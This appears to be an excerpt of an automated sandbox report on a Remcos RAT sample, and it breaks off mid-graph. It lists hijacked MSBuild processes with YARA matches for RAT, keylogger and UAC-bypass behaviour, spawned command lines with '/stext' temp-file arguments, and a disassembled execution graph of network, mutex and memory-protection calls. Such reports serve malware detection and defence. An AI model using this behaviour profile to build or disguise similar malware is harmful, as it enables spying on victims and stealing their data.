                                                                                                                                          Target ID:9
                                                                                                                                          Start time:08:00:43
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                          Imagebase:0x160000
                                                                                                                                          File size:262'432 bytes
                                                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:08:00:43
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                          Imagebase:0x960000
                                                                                                                                          File size:262'432 bytes
                                                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3636685740.0000000002BEF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:08:00:52
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\hxihjvnzszludrvreijvqeqsb"
                                                                                                                                          Imagebase:0xa60000
                                                                                                                                          File size:262'432 bytes
                                                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:08:00:52
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rrvrknybgidhfxrdnswxtjkjbwnl"
                                                                                                                                          Imagebase:0x6d0000
                                                                                                                                          File size:262'432 bytes
                                                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:13
                                                                                                                                          Start time:08:00:52
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bmbkdyiuuqvmpdfhediqewfskcwuitz"
                                                                                                                                          Imagebase:0x990000
                                                                                                                                          File size:262'432 bytes
                                                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Disassembly

                                                                                                                                          Reset < >

                                                                                                                                            Executed Functions

                                                                                                                                            Function 00007FFE162E37B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2981445405.00007FFE162E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE162E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_7ffe162e0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0d082acc1527c3e05132d205091c38198fa7c5d3701235dafbb20c880880ae05
                                                                                                                                            • Instruction ID: 5b8dc56b74c3730fa8ec6d5dfa1e32fa8b67ac2388a7d6d28e8ee5aff2e3d119
                                                                                                                                            • Opcode Fuzzy Hash: 0d082acc1527c3e05132d205091c38198fa7c5d3701235dafbb20c880880ae05
                                                                                                                                            • Instruction Fuzzy Hash: 2801A77111CB0C8FD744EF0CE451AA6B3E0FB89324F10056DE58AC3261D732E882CB41

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:4.8%
                                                                                                                                            Dynamic/Decrypted Code Coverage:4%
                                                                                                                                            Signature Coverage:6.5%
                                                                                                                                            Total number of Nodes:1759
                                                                                                                                            Total number of Limit Nodes:64
                                                                                                                                            execution_graph 52252 41d4d0 52254 41d4e6 ctype ___scrt_fastfail 52252->52254 52253 41d6e3 52258 41d734 52253->52258 52268 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 52253->52268 52254->52253 52273 431f99 21 API calls _Yarn 52254->52273 52257 41d6f4 52257->52258 52259 41d760 52257->52259 52269 431f99 21 API calls _Yarn 52257->52269 52259->52258 52276 41d474 21 API calls ___scrt_fastfail 52259->52276 52261 41d696 ___scrt_fastfail 52261->52258 52274 431f99 21 API calls _Yarn 52261->52274 52264 41d72d ___scrt_fastfail 52264->52258 52270 43264f 52264->52270 52266 41d6be ___scrt_fastfail 52266->52258 52275 431f99 21 API calls _Yarn 52266->52275 52268->52257 52269->52264 52277 43256f 52270->52277 52272 432657 52272->52259 52273->52261 52274->52266 52275->52253 52276->52258 52278 432588 52277->52278 52282 43257e 52277->52282 52278->52282 52283 431f99 21 API calls _Yarn 52278->52283 52280 4325a9 52280->52282 52284 43293a CryptAcquireContextA 52280->52284 52282->52272 52283->52280 52285 432956 52284->52285 52286 43295b CryptGenRandom 52284->52286 52285->52282 52286->52285 52287 432970 CryptReleaseContext 52286->52287 52287->52285 52288 426030 52293 4260f7 recv 52288->52293 52294 44e8b6 52295 44e8c1 52294->52295 52296 44e8e9 52295->52296 52297 44e8da 52295->52297 52298 44e8f8 52296->52298 52316 455573 27 API calls 2 library calls 52296->52316 52315 445354 20 API calls _abort 52297->52315 52303 44b9be 52298->52303 52302 44e8df ___scrt_fastfail 52304 44b9d6 52303->52304 52305 44b9cb 52303->52305 52307 44b9de 52304->52307 52313 44b9e7 _strftime 52304->52313 52317 446aff 52305->52317 52324 446ac5 52307->52324 52309 44ba11 RtlReAllocateHeap 52311 44b9d3 52309->52311 52309->52313 52310 44b9ec 52330 445354 20 API calls _abort 52310->52330 52311->52302 52313->52309 52313->52310 52331 442200 7 API calls 2 library calls 52313->52331 52315->52302 52316->52298 52318 446b3d 52317->52318 52322 446b0d _strftime 52317->52322 52333 445354 20 API calls _abort 52318->52333 52320 446b28 RtlAllocateHeap 52321 446b3b 52320->52321 52320->52322 52321->52311 52322->52318 52322->52320 52332 442200 7 API calls 2 library calls 52322->52332 52325 446ad0 RtlFreeHeap 52324->52325 52326 446af9 __dosmaperr 52324->52326 52325->52326 52327 446ae5 52325->52327 52326->52311 52334 445354 20 API calls _abort 52327->52334 52329 446aeb GetLastError 52329->52326 52330->52311 52331->52313 52332->52322 52333->52321 52334->52329 52335 426091 52340 42610e send 52335->52340 52341 425e56 52342 425e6b 52341->52342 52345 425f0b 52341->52345 52343 425f25 52342->52343 52344 425f5a 52342->52344 52342->52345 52346 425eb9 52342->52346 52347 425f77 52342->52347 52348 425f9e 52342->52348 52354 425eee 52342->52354 52369 424354 50 API calls ctype 52342->52369 52343->52344 52343->52345 52372 41f075 54 API calls 52343->52372 52344->52347 52373 424b7b 21 API calls 52344->52373 52346->52345 52346->52354 52370 41f075 54 API calls 52346->52370 52347->52345 52347->52348 52357 424f78 52347->52357 52348->52345 52374 4255c7 28 API calls 52348->52374 52354->52343 52354->52345 52371 424354 50 API calls ctype 52354->52371 52358 424f97 ___scrt_fastfail 52357->52358 52360 424fa6 52358->52360 52364 424fcb 52358->52364 52375 41e097 21 API calls 52358->52375 52360->52364 52368 424fab 52360->52368 52376 41fad4 47 API calls 52360->52376 52363 424fb4 52363->52364 52379 424185 21 API calls 2 library calls 52363->52379 52364->52348 52366 42504e 52366->52364 52377 431f99 21 API calls _Yarn 52366->52377 52368->52363 52368->52364 52378 41cf6e 50 API calls 52368->52378 52369->52346 52370->52346 52371->52343 52372->52343 52373->52347 52374->52345 52375->52360 52376->52366 52377->52368 52378->52363 52379->52364 52380 1000c7a7 52381 1000c7be 52380->52381 52390 1000c82c 52380->52390 52381->52390 52392 1000c7e6 GetModuleHandleA 52381->52392 52382 1000c872 52383 1000c835 GetModuleHandleA 52385 1000c83f 52383->52385 52386 1000c85f GetProcAddress 52385->52386 52385->52390 52386->52390 52387 1000c7dd 52387->52385 52388 1000c800 GetProcAddress 52387->52388 52387->52390 52389 1000c80d VirtualProtect 52388->52389 52388->52390 52389->52390 52391 1000c81c VirtualProtect 52389->52391 52390->52382 52390->52383 52390->52385 52391->52390 52393 1000c7ef 52392->52393 52400 1000c82c 52392->52400 52404 1000c803 GetProcAddress 52393->52404 52395 1000c872 52396 1000c835 GetModuleHandleA 52402 1000c83f 52396->52402 52397 1000c7f4 52398 1000c800 GetProcAddress 52397->52398 52397->52400 52399 1000c80d VirtualProtect 52398->52399 52398->52400 52399->52400 52401 1000c81c VirtualProtect 52399->52401 52400->52395 52400->52396 52400->52402 52401->52400 52402->52400 52403 1000c85f GetProcAddress 52402->52403 52403->52400 52405 1000c82c 52404->52405 52406 1000c80d VirtualProtect 52404->52406 52408 1000c872 52405->52408 52409 1000c835 GetModuleHandleA 52405->52409 52406->52405 52407 1000c81c VirtualProtect 52406->52407 52407->52405 52411 1000c83f 52409->52411 52410 1000c85f GetProcAddress 52410->52411 52411->52405 52411->52410 52412 43a998 52413 43a9a4 _swprintf ___scrt_is_nonwritable_in_current_image 52412->52413 52414 43a9b2 52413->52414 52418 43a9dc 52413->52418 52430 445354 20 API calls _abort 52414->52430 52416 43a9b7 52431 43a827 26 API calls _Deallocate 52416->52431 52425 444acc EnterCriticalSection 52418->52425 52420 43a9e7 52426 43aa88 52420->52426 52422 43a9c2 __wsopen_s 52425->52420 52427 43aa96 52426->52427 52429 43a9f2 52427->52429 52433 448416 39 API calls 2 library calls 52427->52433 52432 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 52429->52432 52430->52416 52431->52422 52432->52422 52433->52427 52434 414dba 52449 41a51b 52434->52449 52436 414dc3 52459 401fbd 52436->52459 52441 4161f2 52482 401d8c 52441->52482 52444 4161fb 52445 401eea 26 API calls 52444->52445 52446 416207 52445->52446 52447 401eea 26 API calls 52446->52447 52448 416213 52447->52448 52450 41a529 52449->52450 52488 43a88c 52450->52488 52453 41a55c InternetReadFile 52454 41a57f 52453->52454 52454->52453 52455 41a5ac InternetCloseHandle InternetCloseHandle 52454->52455 52458 401eea 26 API calls 52454->52458 52495 401f86 52454->52495 52457 41a5be 52455->52457 52457->52436 52458->52454 52460 401fcc 52459->52460 52506 402501 52460->52506 52462 401fea 52463 404468 52462->52463 52464 40447b 52463->52464 52511 404be8 52464->52511 52466 404490 ctype 52467 404507 WaitForSingleObject 52466->52467 52468 4044e7 52466->52468 52469 40451d 52467->52469 52470 4044f9 send 52468->52470 52515 42051a 56 API calls 52469->52515 52472 404542 52470->52472 52474 401eea 26 API calls 52472->52474 52473 404530 SetEvent 52473->52472 52475 40454a 52474->52475 52476 401eea 26 API calls 52475->52476 52477 404552 52476->52477 52477->52441 52478 401eea 52477->52478 52479 4021b9 52478->52479 52480 4021e8 52479->52480 52521 40262e 52479->52521 52480->52441 52483 40200a 52482->52483 52487 40203a 52483->52487 52529 402654 52483->52529 52485 40202b 52532 4026ba 26 API calls _Deallocate 52485->52532 52487->52444 52493 446aff _strftime 52488->52493 52489 446b3d 52500 445354 20 API calls _abort 52489->52500 52491 446b28 RtlAllocateHeap 52492 41a533 InternetOpenW InternetOpenUrlW 52491->52492 52491->52493 52492->52453 52493->52489 52493->52491 52499 442200 7 API calls 2 library calls 52493->52499 52496 401f8e 52495->52496 52501 402325 52496->52501 52498 401fa4 52498->52454 52499->52493 52500->52492 52502 40232f 52501->52502 52504 40233a 52502->52504 52505 40294a 28 API calls 52502->52505 52504->52498 52505->52504 52507 40250d 52506->52507 52509 40252b 52507->52509 52510 40261a 28 API calls 52507->52510 52509->52462 52510->52509 52512 404bf0 52511->52512 52516 404c0c 52512->52516 52514 404c06 52514->52466 52515->52473 52517 404c16 52516->52517 52519 404c21 52517->52519 52520 404d07 28 API calls 52517->52520 52519->52514 52520->52519 52524 402bee 52521->52524 52523 40263b 52523->52480 52525 402bfb 52524->52525 52527 402c08 std::ios_base::_Tidy 52524->52527 52528 4015d8 26 API calls _Deallocate 52525->52528 52527->52523 52528->52527 52533 402c1a 52529->52533 52532->52487 52536 403340 52533->52536 52537 403348 52536->52537 52538 402662 52537->52538 52540 4038c2 52537->52540 52538->52485 52543 4038cb 52540->52543 52544 401eea 26 API calls 52543->52544 52545 4038ca 52544->52545 52545->52537 52546 402bcc 52547 402bd7 52546->52547 52548 402bdf 52546->52548 52554 403315 52547->52554 52549 402beb 52548->52549 52563 4015d3 52548->52563 52555 4015d3 22 API calls 52554->52555 52556 40332a 52555->52556 52557 402bdd 52556->52557 52558 40333b 52556->52558 52573 43a7ac 26 API calls 3 library calls 52558->52573 52560 43a846 52574 43a854 11 API calls _abort 52560->52574 52562 43a853 52565 43360d 52563->52565 52564 43a88c _Yarn 21 API calls 52564->52565 52565->52564 52566 402be9 52565->52566 52569 43362e std::_Facet_Register 52565->52569 52575 442200 7 API calls 2 library calls 52565->52575 52568 433dec std::_Facet_Register 52577 437bd7 RaiseException 52568->52577 52569->52568 52576 437bd7 RaiseException 52569->52576 52572 433e09 52573->52560 52574->52562 52575->52565 52576->52568 52577->52572 52578 4339be 52579 4339ca ___scrt_is_nonwritable_in_current_image 52578->52579 52610 4336b3 52579->52610 52581 4339d1 52582 433b24 52581->52582 52585 4339fb 52581->52585 52910 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 52582->52910 52584 433b2b 52911 4426be 28 API calls _abort 52584->52911 52592 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 52585->52592 52904 4434d1 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 52585->52904 52587 433b31 52912 442670 28 API calls _abort 52587->52912 52590 433a14 52593 433a1a 52590->52593 52905 443475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 52590->52905 52591 433b39 52595 433a9b 52592->52595 52906 43edf4 38 API calls 2 library calls 52592->52906 52621 433c5e 52595->52621 52604 433abd 52604->52584 52605 433ac1 52604->52605 52606 433aca 52605->52606 52908 442661 28 API calls _abort 52605->52908 52909 433842 13 API calls 2 library calls 52606->52909 52609 433ad2 52609->52593 52611 4336bc 52610->52611 52913 433e0a IsProcessorFeaturePresent 52611->52913 52613 4336c8 52914 4379ee 10 API calls 3 library calls 52613->52914 52615 4336cd 52616 4336d1 52615->52616 52915 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 52615->52915 52616->52581 52618 4336da 52619 4336e8 52618->52619 52916 437a17 8 API calls 3 library calls 52618->52916 52619->52581 52917 436050 52621->52917 52624 433aa1 52625 443422 52624->52625 52919 44ddc9 52625->52919 52627 44342b 52629 433aaa 52627->52629 52923 44e0d3 38 API calls 52627->52923 52630 40d767 52629->52630 52925 41bce3 LoadLibraryA GetProcAddress 52630->52925 52632 40d783 GetModuleFileNameW 52930 40e168 52632->52930 52634 40d79f 52635 401fbd 28 API calls 52634->52635 52636 40d7ae 52635->52636 52637 401fbd 28 API calls 52636->52637 52638 40d7bd 52637->52638 52945 41afc3 52638->52945 52642 40d7cf 52643 401d8c 26 API calls 52642->52643 52644 40d7d8 52643->52644 52645 40d835 52644->52645 52646 40d7eb 52644->52646 52970 401d64 52645->52970 53215 40e986 111 API calls 52646->53215 52649 40d7fd 52651 401d64 28 API calls 52649->52651 52650 40d845 52652 401d64 28 API calls 52650->52652 52655 40d809 52651->52655 52653 40d864 52652->52653 52975 404cbf 52653->52975 53216 40e937 68 API calls 52655->53216 52656 40d873 52979 405ce6 52656->52979 52659 40d87f 52982 401eef 52659->52982 52660 40d824 53217 40e155 68 API calls 52660->53217 52663 40d88b 52664 401eea 26 API calls 52663->52664 52665 40d894 52664->52665 52667 401eea 26 API calls 52665->52667 52666 401eea 26 API calls 52668 40dc9f 52666->52668 52669 40d89d 52667->52669 52907 433c94 GetModuleHandleW 52668->52907 52670 401d64 28 API calls 52669->52670 52671 40d8a6 52670->52671 52986 401ebd 52671->52986 52673 40d8b1 52674 401d64 28 API calls 52673->52674 52675 40d8ca 52674->52675 52676 401d64 28 API calls 52675->52676 52678 40d8e5 52676->52678 52677 40d946 52679 401d64 28 API calls 52677->52679 52694 40e134 52677->52694 52678->52677 53218 4085b4 52678->53218 52686 40d95d 52679->52686 52681 40d912 52682 401eef 26 API calls 52681->52682 52683 40d91e 52682->52683 52684 401eea 26 API calls 52683->52684 52687 40d927 52684->52687 52685 40d9a4 52990 40bed7 52685->52990 52686->52685 52691 4124b7 3 API calls 52686->52691 53222 4124b7 RegOpenKeyExA 52687->53222 52689 40d9aa 52690 40d82d 52689->52690 52993 41a463 52689->52993 52690->52666 52696 40d988 52691->52696 53310 412902 30 API calls 52694->53310 52695 40d9c5 52698 40da18 52695->52698 53010 40697b 52695->53010 52696->52685 53225 412902 30 API calls 52696->53225 52699 401d64 28 API calls 52698->52699 52702 40da21 52699->52702 52711 40da32 52702->52711 52712 40da2d 52702->52712 52704 40e14a 53311 4112b5 64 API calls ___scrt_fastfail 52704->53311 52705 40d9e4 53226 40699d 30 API calls 52705->53226 52706 40d9ee 52710 401d64 28 API calls 52706->52710 52719 40d9f7 52710->52719 52716 401d64 28 API calls 52711->52716 53229 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 52712->53229 52713 40d9e9 53227 4064d0 97 API calls 52713->53227 52717 40da3b 52716->52717 53014 41ae08 52717->53014 52719->52698 52721 40da13 52719->52721 52720 40da46 53018 401e18 52720->53018 53228 4064d0 97 API calls 52721->53228 52723 40da51 53022 401e13 52723->53022 52726 40da5a 52727 401d64 28 API calls 52726->52727 52728 40da63 52727->52728 52729 401d64 28 API calls 52728->52729 52730 40da7d 52729->52730 52731 401d64 28 API calls 52730->52731 52732 40da97 52731->52732 52733 401d64 28 API calls 52732->52733 52735 40dab0 52733->52735 52734 40db1d 52737 40db2c 52734->52737 52743 40dcaa ___scrt_fastfail 52734->52743 52735->52734 52736 401d64 28 API calls 52735->52736 52741 40dac5 _wcslen 52736->52741 52738 40db35 52737->52738 52766 40dbb1 ___scrt_fastfail 52737->52766 52739 401d64 28 API calls 52738->52739 52740 40db3e 52739->52740 52742 401d64 28 API calls 52740->52742 52741->52734 52745 401d64 28 API calls 52741->52745 52744 40db50 52742->52744 53289 41265d RegOpenKeyExA 52743->53289 52748 401d64 28 API calls 52744->52748 52746 40dae0 52745->52746 52750 401d64 28 API calls 52746->52750 52749 40db62 52748->52749 52753 401d64 28 API calls 52749->52753 52751 40daf5 52750->52751 53230 40c89e 52751->53230 52752 40dcef 52754 401d64 28 API calls 52752->52754 52756 40db8b 52753->52756 52757 40dd16 52754->52757 52762 401d64 28 API calls 52756->52762 53036 401f66 52757->53036 52759 401e18 26 API calls 52761 40db14 52759->52761 52764 401e13 26 API calls 52761->52764 52765 40db9c 52762->52765 52763 40dd25 53040 4126d2 RegCreateKeyA 52763->53040 52764->52734 53287 40bc67 46 API calls _wcslen 52765->53287 53026 4128a2 52766->53026 52770 40dbac 52770->52766 52772 40dc45 ctype 52775 401d64 28 API calls 52772->52775 52773 401d64 28 API calls 52774 40dd47 52773->52774 53046 43a5e7 52774->53046 52776 40dc5c 52775->52776 52776->52752 52779 40dc70 52776->52779 52782 401d64 28 API calls 52779->52782 52780 40dd5e 53292 41beb0 87 API calls ___scrt_fastfail 52780->53292 52781 40dd81 52785 401f66 28 API calls 52781->52785 52783 40dc7e 52782->52783 52786 41ae08 28 API calls 52783->52786 52788 40dd96 52785->52788 52789 40dc87 52786->52789 52787 40dd65 CreateThread 52787->52781 54376 41c96f 10 API calls 52787->54376 52790 401f66 28 API calls 52788->52790 53288 40e219 119 API calls 52789->53288 52792 40dda5 52790->52792 53050 41a686 52792->53050 52793 40dc8c 52793->52752 52795 40dc93 52793->52795 52795->52690 52797 401d64 28 API calls 52798 40ddb6 52797->52798 52799 401d64 28 API calls 52798->52799 52800 40ddcb 52799->52800 52801 401d64 28 API calls 52800->52801 52802 40ddeb 52801->52802 52803 43a5e7 _strftime 42 API calls 52802->52803 52804 40ddf8 52803->52804 52805 401d64 28 API calls 52804->52805 52806 40de03 52805->52806 52807 401d64 28 API calls 52806->52807 52808 40de14 52807->52808 52809 401d64 28 API calls 52808->52809 52810 40de29 52809->52810 52811 401d64 28 API calls 52810->52811 52812 40de3a 52811->52812 52813 40de41 StrToIntA 52812->52813 53074 409517 52813->53074 52816 401d64 28 API calls 52817 40de5c 52816->52817 52818 40dea1 52817->52818 52819 40de68 52817->52819 52822 401d64 28 API calls 52818->52822 53293 43360d 22 API calls 3 library calls 52819->53293 52821 40de71 52823 401d64 28 API calls 52821->52823 52824 40deb1 52822->52824 52825 40de84 52823->52825 52827 40def9 52824->52827 52828 40debd 52824->52828 52826 40de8b CreateThread 52825->52826 52826->52818 54379 419128 112 API calls 2 library calls 52826->54379 52829 401d64 28 API calls 52827->52829 53294 43360d 22 API calls 3 library calls 52828->53294 52831 40df02 52829->52831 52835 40df6c 52831->52835 52836 40df0e 52831->52836 52832 40dec6 52833 401d64 28 API calls 52832->52833 52834 40ded8 52833->52834 52837 40dedf CreateThread 52834->52837 52838 401d64 28 API calls 52835->52838 52839 401d64 28 API calls 52836->52839 52837->52827 54378 419128 112 API calls 2 library calls 52837->54378 52840 40df75 52838->52840 52841 40df1e 52839->52841 52842 40df81 52840->52842 52843 40dfba 52840->52843 52844 401d64 28 API calls 52841->52844 52846 401d64 28 API calls 52842->52846 53099 41a7a2 GetComputerNameExW GetUserNameW 52843->53099 52847 40df33 52844->52847 52852 40df8a 52846->52852 53295 40c854 52847->53295 52849 401e18 26 API calls 52851 40dfce 52849->52851 52855 401e13 26 API calls 52851->52855 52853 401d64 28 API calls 52852->52853 52856 40df9f 52853->52856 52858 40dfd7 52855->52858 52867 43a5e7 _strftime 42 API calls 52856->52867 52857 401e18 26 API calls 52859 40df52 52857->52859 52860 40dfe0 SetProcessDEPPolicy 52858->52860 52861 40dfe3 CreateThread 52858->52861 52864 401e13 26 API calls 52859->52864 52860->52861 52862 40e004 52861->52862 52863 40dff8 CreateThread 52861->52863 54348 40e54f 52861->54348 52865 40e019 52862->52865 52866 40e00d CreateThread 52862->52866 52863->52862 54380 410f36 145 API calls 52863->54380 52868 40df5b CreateThread 52864->52868 52870 40e073 52865->52870 52872 401f66 28 API calls 52865->52872 52866->52865 54375 411524 38 API calls ___scrt_fastfail 52866->54375 52869 40dfac 52867->52869 52868->52835 54377 40196b 49 API calls _strftime 52868->54377 53306 40b95c 7 API calls 52869->53306 53110 41246e RegOpenKeyExA 52870->53110 52873 40e046 52872->52873 53307 404c9e 28 API calls 52873->53307 52877 40e053 52879 401f66 28 API calls 52877->52879 52878 40e12a 53122 40cbac 52878->53122 52882 40e062 52879->52882 52881 41ae08 28 API calls 52884 40e0a4 52881->52884 52885 41a686 79 API calls 52882->52885 53113 412584 RegOpenKeyExW 52884->53113 52887 40e067 52885->52887 52888 401eea 26 API calls 52887->52888 52888->52870 52891 401e13 26 API calls 52894 40e0c5 52891->52894 52892 40e0ed DeleteFileW 52893 40e0f4 52892->52893 52892->52894 52896 41ae08 28 API calls 52893->52896 52894->52892 52894->52893 52895 40e0db Sleep 52894->52895 53308 401e07 52895->53308 52898 40e104 52896->52898 53118 41297a RegOpenKeyExW 52898->53118 52900 40e117 52901 401e13 26 API calls 52900->52901 52902 40e121 52901->52902 52903 401e13 26 API calls 52902->52903 52903->52878 52904->52590 52905->52592 52906->52595 52907->52604 52908->52606 52909->52609 52910->52584 52911->52587 52912->52591 52913->52613 52914->52615 52915->52618 52916->52616 52918 433c71 GetStartupInfoW 52917->52918 52918->52624 52920 44dddb 52919->52920 52921 44ddd2 52919->52921 52920->52627 52924 44dcc8 51 API calls 5 library calls 52921->52924 52923->52627 52924->52920 52926 41bd22 LoadLibraryA GetProcAddress 52925->52926 52927 41bd12 GetModuleHandleA GetProcAddress 52925->52927 52928 41bd4b 32 API calls 52926->52928 52929 41bd3b LoadLibraryA GetProcAddress 52926->52929 52927->52926 52928->52632 52929->52928 53312 41a63f FindResourceA 52930->53312 52933 43a88c _Yarn 21 API calls 52934 40e192 ctype 52933->52934 52935 401f86 28 API calls 52934->52935 52936 40e1ad 52935->52936 52937 401eef 26 API calls 52936->52937 52938 40e1b8 52937->52938 52939 401eea 26 API calls 52938->52939 52940 40e1c1 52939->52940 52941 43a88c _Yarn 21 API calls 52940->52941 52942 40e1d2 ctype 52941->52942 53315 406052 52942->53315 52944 40e205 52944->52634 52965 41afd6 52945->52965 52946 41b046 52947 401eea 26 API calls 52946->52947 52948 41b078 52947->52948 52950 401eea 26 API calls 52948->52950 52949 41b048 52952 403b60 28 API calls 52949->52952 52951 41b080 52950->52951 52954 401eea 26 API calls 52951->52954 52955 41b054 52952->52955 52956 40d7c6 52954->52956 52957 401eef 26 API calls 52955->52957 52966 40e8bd 52956->52966 52959 41b05d 52957->52959 52958 401eef 26 API calls 52958->52965 52960 401eea 26 API calls 52959->52960 52962 41b065 52960->52962 52961 401eea 26 API calls 52961->52965 52963 41bfa9 28 API calls 52962->52963 52963->52946 52965->52946 52965->52949 52965->52958 52965->52961 53318 403b60 52965->53318 53321 41bfa9 52965->53321 52967 40e8ca 52966->52967 52969 40e8da 52967->52969 53371 40200a 26 API calls 52967->53371 52969->52642 52971 401d6c 52970->52971 52972 401d74 52971->52972 53372 401fff 28 API calls 52971->53372 52972->52650 52976 404ccb 52975->52976 53373 402e78 52976->53373 52978 404cee 52978->52656 53382 404bc4 52979->53382 52981 405cf4 52981->52659 52983 401efe 52982->52983 52985 401f0a 52983->52985 53391 4021b9 52983->53391 52985->52663 52988 401ec9 52986->52988 52987 401ee4 52987->52673 52988->52987 52989 402325 28 API calls 52988->52989 52989->52987 53395 401e8f 52990->53395 52992 40bee1 CreateMutexA GetLastError 52992->52689 53397 41b15b 52993->53397 52995 41a471 53401 412513 RegOpenKeyExA 52995->53401 52998 401eef 26 API calls 52999 41a49f 52998->52999 53000 401eea 26 API calls 52999->53000 53001 41a4a7 53000->53001 53002 41a4fa 53001->53002 53003 412513 31 API calls 53001->53003 53002->52695 53004 41a4cd 53003->53004 53005 41a4d8 StrToIntA 53004->53005 53006 41a4ef 53005->53006 53007 41a4e6 53005->53007 53008 401eea 26 API calls 53006->53008 53406 41c102 28 API calls 53007->53406 53008->53002 53011 40698f 53010->53011 53012 4124b7 3 API calls 53011->53012 53013 406996 53012->53013 53013->52705 53013->52706 53015 41ae1c 53014->53015 53407 40b027 53015->53407 53017 41ae24 53017->52720 53019 401e27 53018->53019 53021 401e33 53019->53021 53416 